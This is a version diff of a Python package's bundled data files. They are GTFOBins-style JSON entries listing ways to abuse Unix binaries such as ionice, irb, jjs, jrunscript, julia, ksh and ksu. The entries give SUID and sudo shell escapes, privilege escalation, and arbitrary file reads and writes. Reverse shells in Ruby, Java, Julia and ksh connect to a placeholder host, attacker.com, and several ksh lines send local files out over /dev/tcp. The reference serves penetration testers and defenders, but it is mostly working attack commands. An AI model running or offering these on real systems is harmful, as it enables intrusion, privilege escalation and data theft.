gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/install.json

@@ -1,14 +1,15 @@
 {
-  "description": "This can be run with elevated privileges to change permissions ('6' denotes the SUID bits) and then read, write, or execute a copy of the file.",
   "functions": {
     "suid": [
       {
-        "code": "TF=$(mktemp)\n./install -m 6777 [file] $TF\n"
+        
+        "code": "LFILE=file_to_change\nTF=$(mktemp)\n./install -m 6777 $LFILE $TF\n"
       }
     ],
     "sudo": [
       {
-        "code": "TF=$(mktemp)\nsudo install -m 6777 [file] $TF\n"
+        
+        "code": "LFILE=file_to_change\nTF=$(mktemp)\nsudo install -m 6777 $LFILE $TF\n"
       }
     ]
   }

gtfo/data/ionice.json

@@ -2,18 +2,21 @@
   "functions": {
     "shell": [
       {
-        "code": "ionice /bin/sh"
+        
+        "code": "ionice /bin/sh\n"
       }
     ],
     "suid": [
       {
-        "code": "./ionice /bin/sh -p"
+        
+        "code": "./ionice /bin/sh -p\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo ionice /bin/sh"
+        
+        "code": "sudo ionice /bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/ip.json

@@ -1,14 +1,15 @@
 {
-  "description": "The read file content is corrupted by error prints.\n",
   "functions": {
     "file-read": [
       {
-        "code": "ip -force -batch [file]\n"
+        
+        "code": "LFILE=file_to_read\nip -force -batch \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./ip -force -batch [file]\n"
+        
+        "code": "LFILE=file_to_read\n./ip -force -batch \"$LFILE\"\n"
       },
       {
         "description": "This only works for Linux with CONFIG_NET_NS=y.",
@@ -17,12 +18,17 @@
     ],
     "sudo": [
       {
-        "code": "sudo ip -force -batch [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo ip -force -batch \"$LFILE\"\n"
       },
       {
         "description": "This only works for Linux with CONFIG_NET_NS=y.",
         "code": "sudo ip netns add foo\nsudo ip netns exec foo /bin/sh\nsudo ip netns delete foo\n"
+      },
+      {
+        "description": "This only works for Linux with CONFIG_NET_NS=y. This version also grants network access.",
+        "code": "sudo ip netns add foo\nsudo ip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar\nsudo ip netns exec bar /bin/sh\nsudo ip netns delete foo\nsudo ip netns delete bar\n"
       }
     ]
   }
-}
+}

gtfo/data/irb.json

@@ -2,46 +2,51 @@
   "functions": {
     "shell": [
       {
+        
         "code": "irb\nexec '/bin/bash'\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
-        "code": "irb\nrequire 'socket'; exit if fork;c=TCPSocket.new('[host]', [port]);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read} end\n"
+        "description": "Run `nc -l -p 12345` on the attacker box to receive the shell.",
+        "code": "export RHOST='127.0.0.1'\nexport RPORT=9000\nirb\nrequire 'socket'; exit if fork;c=TCPSocket.new(ENV[\"RHOST\"],ENV[\"RPORT\"]);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read} end\n"
       }
     ],
     "file-upload": [
       {
-        "description": "Serve files in the local folder running an HTTP server on port [port].",
-        "code": "irb\nrequire 'webrick'; WEBrick::HTTPServer.new(:Port => [port], :DocumentRoot => Dir.pwd).start;\n"
+        "description": "Serve files in the local folder running an HTTP server on port 8888.",
+        "code": "irb\nrequire 'webrick'; WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start;\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file via HTTP GET request.",
-        "code": "irb\nrequire 'open-uri'; IO.copy_stream(open('[url]'), '[file]')\n"
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\nirb\nrequire 'open-uri'; download = open(ENV['URL']); IO.copy_stream(download, ENV['LFILE'])\n"
       }
     ],
     "file-write": [
       {
-        "code": "irb\nFile.open(\"[file]\", \"w+\") { |f| f.write(\"DATA\") }\n"
+        
+        "code": "irb\nFile.open(\"file_to_write\", \"w+\") { |f| f.write(\"DATA\") }\n"
       }
     ],
     "file-read": [
       {
-        "code": "irb\nputs File.read(\"[file]\")\n"
+        
+        "code": "irb\nputs File.read(\"file_to_read\")\n"
       }
     ],
     "library-load": [
       {
+        
         "code": "irb\nrequire \"fiddle\"; Fiddle.dlopen(\"lib.so\")\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo irb\nexec '/bin/bash'\n"
       }
     ]
   }
-}
+}

gtfo/data/ispell.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "ispell /etc/passwd\n!/bin/sh\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./ispell /etc/passwd\n!/bin/sh -p\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo ispell /etc/passwd\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/java.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "",
+        "code": "TD=$(mktemp -d)\nSOURCE='public class Exec { public static void main(String[] args) throws Exception { new ProcessBuilder(\"/bin/sh\").inheritIO().start().waitFor(); } }'\necho \"$SOURCE\" > $TD/Exec.java\njavac $TD/Exec.java\nsudo java -cp $TD Exec\n"
+      }
+    ]
+  }
+}

gtfo/data/jjs.json

@@ -1,43 +1,46 @@
 {
-  "description": "This tool is installed starting with Java SE 8.",
   "functions": {
     "shell": [
       {
-        "code": "echo \"Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)').waitFor()\" | jjs"
+        
+        "code": "echo \"Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)').waitFor()\" | jjs\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
-        "code": "echo 'var ProcessBuilder = Java.type(\"java.lang.ProcessBuilder\");\nvar p=new ProcessBuilder(\"/bin/bash\", \"-i\").redirectErrorStream(true).start();\nvar Socket = Java.type(\"java.net.Socket\");\nvar s=new Socket(\"[host]\",[port]);\nvar pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\nvar po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type(\"java.lang.Thread\").sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();' | jjs\n"
+        "description": "Run `nc -l -p 12345` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\necho 'var host=Java.type(\"java.lang.System\").getenv(\"RHOST\");\nvar port=Java.type(\"java.lang.System\").getenv(\"RPORT\");\nvar ProcessBuilder = Java.type(\"java.lang.ProcessBuilder\");\nvar p=new ProcessBuilder(\"/bin/bash\", \"-i\").redirectErrorStream(true).start();\nvar Socket = Java.type(\"java.net.Socket\");\nvar s=new Socket(host,port);\nvar pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\nvar po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type(\"java.lang.Thread\").sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();' | jjs\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file via HTTP GET request.",
-        "code": "echo \"var URL = Java.type('java.net.URL');\nvar ws = new URL('[url]');\nvar Channels = Java.type('java.nio.channels.Channels');\nvar rbc = Channels.newChannel(ws.openStream());\nvar FileOutputStream = Java.type('java.io.FileOutputStream');\nvar fos = new FileOutputStream('[file]');\nfos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);\nfos.close();\nrbc.close();\" | jjs\n"
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\necho \"var URL = Java.type('java.net.URL');\nvar ws = new URL('$URL');\nvar Channels = Java.type('java.nio.channels.Channels');\nvar rbc = Channels.newChannel(ws.openStream());\nvar FileOutputStream = Java.type('java.io.FileOutputStream');\nvar fos = new FileOutputStream('$LFILE');\nfos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);\nfos.close();\nrbc.close();\" | jjs\n"
       }
     ],
     "file-write": [
       {
-        "code": "echo 'var FileWriter = Java.type(\"java.io.FileWriter\");\nvar fw=new FileWriter(\"[file]\");\nfw.write(\"DATA\");\nfw.close();' | jjs\n"
+        
+        "code": "echo 'var FileWriter = Java.type(\"java.io.FileWriter\");\nvar fw=new FileWriter(\"./file_to_write\");\nfw.write(\"DATA\");\nfw.close();' | jjs\n"
       }
     ],
     "file-read": [
       {
-        "code": "echo 'var BufferedReader = Java.type(\"java.io.BufferedReader\");\nvar FileReader = Java.type(\"java.io.FileReader\");\nvar br = new BufferedReader(new FileReader(\"[file]\"));\nwhile ((line = br.readLine()) != null) { print(line); }' | jjs\n"
+        
+        "code": "echo 'var BufferedReader = Java.type(\"java.io.BufferedReader\");\nvar FileReader = Java.type(\"java.io.FileReader\");\nvar br = new BufferedReader(new FileReader(\"file_to_read\"));\nwhile ((line = br.readLine()) != null) { print(line); }' | jjs\n"
       }
     ],
     "suid": [
       {
         "description": "This has been found working in macOS but failing on Linux systems.",
-        "code": "echo \"Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \\$@|sh\\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()\" | ./jjs"
+        "code": "echo \"Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \\$@|sh\\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()\" | ./jjs\n"
       }
     ],
     "sudo": [
       {
-        "code": "echo \"Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)').waitFor()\" | sudo jjs"
+        
+        "code": "echo \"Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)').waitFor()\" | sudo jjs\n"
       }
     ]
   }
-}
+}

gtfo/data/joe.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "joe\n^K!/bin/sh\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        
+        "code": "./joe\n^K!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo joe\n^K!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/join.json

@@ -2,17 +2,20 @@
   "functions": {
     "file-read": [
       {
-        "code": "join -a 2 /dev/null [file]\n"
+        
+        "code": "LFILE=file_to_read\njoin -a 2 /dev/null $LFILE\n"
       }
     ],
     "suid": [
       {
-        "code": "join -a 2 /dev/null [file]\n"
+        
+        "code": "LFILE=file_to_read\n./join -a 2 /dev/null $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo join -a 2 /dev/null [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo join -a 2 /dev/null $LFILE\n"
       }
     ]
   }

gtfo/data/journalctl.json

@@ -1,15 +1,16 @@
 {
-  "description": "This invokes the default pager, which is likely to be 'less', other functions may apply. This might not work if run by unprivileged users depending on the system configuration.",
   "functions": {
     "shell": [
       {
+        
         "code": "journalctl\n!/bin/sh\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo journalctl\n!/bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/jq.json

@@ -2,18 +2,21 @@
   "functions": {
     "file-read": [
       {
-        "code": "jq -Rr . [file]\n"
+        
+        "code": "LFILE=file_to_read\njq -Rr . \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./jq -Rr . [file]\n"
+        
+        "code": "LFILE=file_to_read\n./jq -Rr . \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo jq -Rr . [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo jq -Rr . \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/jrunscript.json

@@ -1,43 +1,46 @@
 {
-  "description": "This tool is installed starting with Java SE 6.",
   "functions": {
     "shell": [
       {
-        "code": "jrunscript -e \"exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)')\""
+        
+        "code": "jrunscript -e \"exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)')\"\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
-        "code": "jrunscript -e 'var p=new java.lang.ProcessBuilder(\"/bin/bash\", \"-i\").redirectErrorStream(true).start();\nvar s=new java.net.Socket(\"[host]\",[port]);\nvar pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\nvar po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){\nwhile(pi.available()>0)so.write(pi.read());\nwhile(pe.available()>0)so.write(pe.read());\nwhile(si.available()>0)po.write(si.read());\nso.flush();po.flush();\njava.lang.Thread.sleep(50);\ntry {p.exitValue();break;}catch (e){}};p.destroy();s.close();'\n"
+        "description": "Run `nc -l -p 12345` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\njrunscript -e 'var host='\"'\"\"$RHOST\"\"'\"'; var port='\"$RPORT\"';\nvar p=new java.lang.ProcessBuilder(\"/bin/bash\", \"-i\").redirectErrorStream(true).start();\nvar s=new java.net.Socket(host,port);\nvar pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\nvar po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){\nwhile(pi.available()>0)so.write(pi.read());\nwhile(pe.available()>0)so.write(pe.read());\nwhile(si.available()>0)po.write(si.read());\nso.flush();po.flush();\njava.lang.Thread.sleep(50);\ntry {p.exitValue();break;}catch (e){}};p.destroy();s.close();'\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file via HTTP GET request.",
-        "code": "jrunscript -e \"cp('[url]','[file]')\"\n"
+        "code": "URL=http://attacker.com/file_to_get\nLFILE=file_to_save\njrunscript -e \"cp('$URL','$LFILE')\"\n"
       }
     ],
     "file-write": [
       {
-        "code": "jrunscript -e 'var fw=new java.io.FileWriter(\"[file]\"); fw.write(\"DATA\"); fw.close();'"
+        
+        "code": "jrunscript -e 'var fw=new java.io.FileWriter(\"./file_to_write\"); fw.write(\"DATA\"); fw.close();'\n"
       }
     ],
     "file-read": [
       {
-        "code": "jrunscript -e 'br = new BufferedReader(new java.io.FileReader(\"[file]\")); while ((line = br.readLine()) != null) { print(line); }'"
+        
+        "code": "jrunscript -e 'br = new BufferedReader(new java.io.FileReader(\"file_to_read\")); while ((line = br.readLine()) != null) { print(line); }'\n"
       }
     ],
     "suid": [
       {
         "description": "This has been found working in macOS but failing on Linux systems.",
-        "code": "./jrunscript -e \"exec('/bin/sh -pc \\$@|sh\\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)')\""
+        "code": "./jrunscript -e \"exec('/bin/sh -pc \\$@|sh\\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)')\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo jrunscript -e \"exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)')\""
+        
+        "code": "sudo jrunscript -e \"exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)')\"\n"
       }
     ]
   }
-}
+}

gtfo/data/jshell.json

@@ -0,0 +1,35 @@
+{
+  "comment": "jshell is the Java REPL. It can be abused to read and write files using its built-in commands.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "jshell\njshell> /open /etc/passwd\n",
+        "contexts": {
+          "sudo": {
+            "comment": "Use /open to read arbitrary files into the REPL.\n"
+          }
+        }
+      }
+    ],
+    "file-write": [
+      {
+        "code": "jshell\njshell> int x = 42;\njshell> /save /tmp/pwned.txt\n",
+        "contexts": {
+          "sudo": {
+            "comment": "Use /save to write REPL contents into arbitrary files.\n"
+          }
+        }
+      }
+    ],
+    "shell": [
+      {
+        "code": "jshell\njshell> Runtime.getRuntime().exec(\"/bin/sh -c id\");\n",
+        "contexts": {
+          "sudo": {
+            "comment": "Execute arbitrary system commands via Java Runtime.\n"
+          }
+        }
+      }
+    ]
+  }
+}

gtfo/data/jtag.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "jtag --interactive\nshell /bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo jtag --interactive\nshell /bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/julia.json

@@ -0,0 +1,46 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "julia -e 'run(`/bin/sh`)'\n"
+      }
+    ],
+    "file-read": [
+      {
+        
+        "code": "export LFILE=file_to_read\njulia -e 'print(open(f->read(f, String), ENV[\"LFILE\"]))'\n"
+      }
+    ],
+    "file-write": [
+      {
+        
+        "code": "export LFILE=file_to_write\njulia -e 'open(f->write(f, \"DATA\"), ENV[\"LFILE\"], \"w\")'\n"
+      }
+    ],
+    "file-download": [
+      {
+        
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\njulia -e 'download(ENV[\"URL\"], ENV[\"LFILE\"])'\n"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run `nc -l -p 12345` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\njulia -e 'using Sockets; sock=connect(ENV[\"RHOST\"], parse(Int64,ENV[\"RPORT\"])); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./julia -e 'run(`/bin/sh -p`)'\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo julia -e 'run(`/bin/sh`)'\n"
+      }
+    ]
+  }
+}

gtfo/data/knife.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "knife exec -E 'exec \"/bin/sh\"'\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo knife exec -E 'exec \"/bin/sh\"'\n"
+      }
+    ]
+  }
+}

gtfo/data/ksh.json

@@ -2,59 +2,63 @@
   "functions": {
     "shell": [
       {
-        "code": "ksh"
+        
+        "code": "ksh\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
-        "code": "ksh -c 'ksh -i > /dev/tcp/[host]/[port] 2>&1 0>&1'\n"
+        "description": "Run `nc -l -p 12345` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'\n"
       }
     ],
     "file-upload": [
       {
         "description": "Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
-        "code": "ksh -c 'echo -e \"POST / HTTP/0.9\\n\\n$(cat [file])\" > /dev/tcp/[host]/[port]'\n"
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LFILE=file_to_send\nksh -c 'echo -e \"POST / HTTP/0.9\\n\\n$(cat $LFILE)\" > /dev/tcp/$RHOST/$RPORT'\n"
       },
       {
-        "description": "Send local file using a TCP connection. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file.",
-        "code": "ksh -c 'cat [file] > /dev/tcp/[host]/[port]'\n"
+        "description": "Send local file using a TCP connection. Run `nc -l -p 12345 > \"file_to_save\"` on the attacker box to collect the file.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LFILE=file_to_send\nksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file via HTTP GET request.",
-        "code": "ksh -c '{ echo -ne \"GET /[file] HTTP/1.0\\r\\nhost: [host]\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n    3<>/dev/tcp/[host]/[port] \\\n    | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } > [file]'\n"
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LFILE=file_to_get\nksh -c '{ echo -ne \"GET /$LFILE HTTP/1.0\\r\\nhost: $RHOST\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n    3<>/dev/tcp/$RHOST/$RPORT \\\n    | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } > $LFILE'\n"
       },
       {
-        "description": "Fetch remote file using a TCP connection. Run 'nc -l -p [port] < [file]' on the attacker box to send the file.",
-        "code": "ksh -c 'cat < /dev/tcp/[host]/[port] > [file]'\n"
+        "description": "Fetch remote file using a TCP connection. Run `nc -l -p 12345 < \"file_to_send\"` on the attacker box to send the file.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LFILE=file_to_get\nksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'\n"
       }
     ],
     "file-write": [
       {
-        "code": "ksh -c 'echo DATA > [file]'\n"
+        
+        "code": "export LFILE=file_to_write\nksh -c 'echo DATA > $LFILE'\n"
       }
     ],
     "file-read": [
       {
         "description": "It trims trailing newlines.",
-        "code": "ksh -c 'echo \"$(<[file])\"'\n"
+        "code": "export LFILE=file_to_read\nksh -c 'echo \"$(<$LFILE)\"'\n"
       },
       {
         "description": "It trims trailing newlines.",
-        "code": "ksh -c $'read -r -d \\x04 < [file]; echo \"$REPLY\"'\n"
+        "code": "export LFILE=file_to_read\nksh -c $'read -r -d \\x04 < \"$LFILE\"; echo \"$REPLY\"'\n"
       }
     ],
     "suid": [
       {
-        "code": "./ksh -p"
+        
+        "code": "./ksh -p\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo ksh"
+        
+        "code": "sudo ksh\n"
       }
     ]
   }
-}
+}

gtfo/data/ksshell.json

@@ -1,20 +1,22 @@
 {
-  "description": "Each line is corrupted by a prefix string. Also consider that lines are actually parsed as 'kickstart' scripts thus some file contents may lead to unexpected results.\n",
   "functions": {
     "file-read": [
       {
-        "code": "ksshell -i [file]\n"
+        
+        "code": "LFILE=file_to_read\nksshell -i $LFILE\n"
       }
     ],
     "suid": [
       {
-        "code": "./ksshell -i [file]\n"
+        
+        "code": "LFILE=file_to_read\n./ksshell -i $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo ksshell -i [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo ksshell -i $LFILE\n"
       }
     ]
   }
-}
+}

gtfo/data/ksu.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        
+        "code": "sudo ksu -q -e /bin/sh\n"
+      }
+    ]
+  }
+}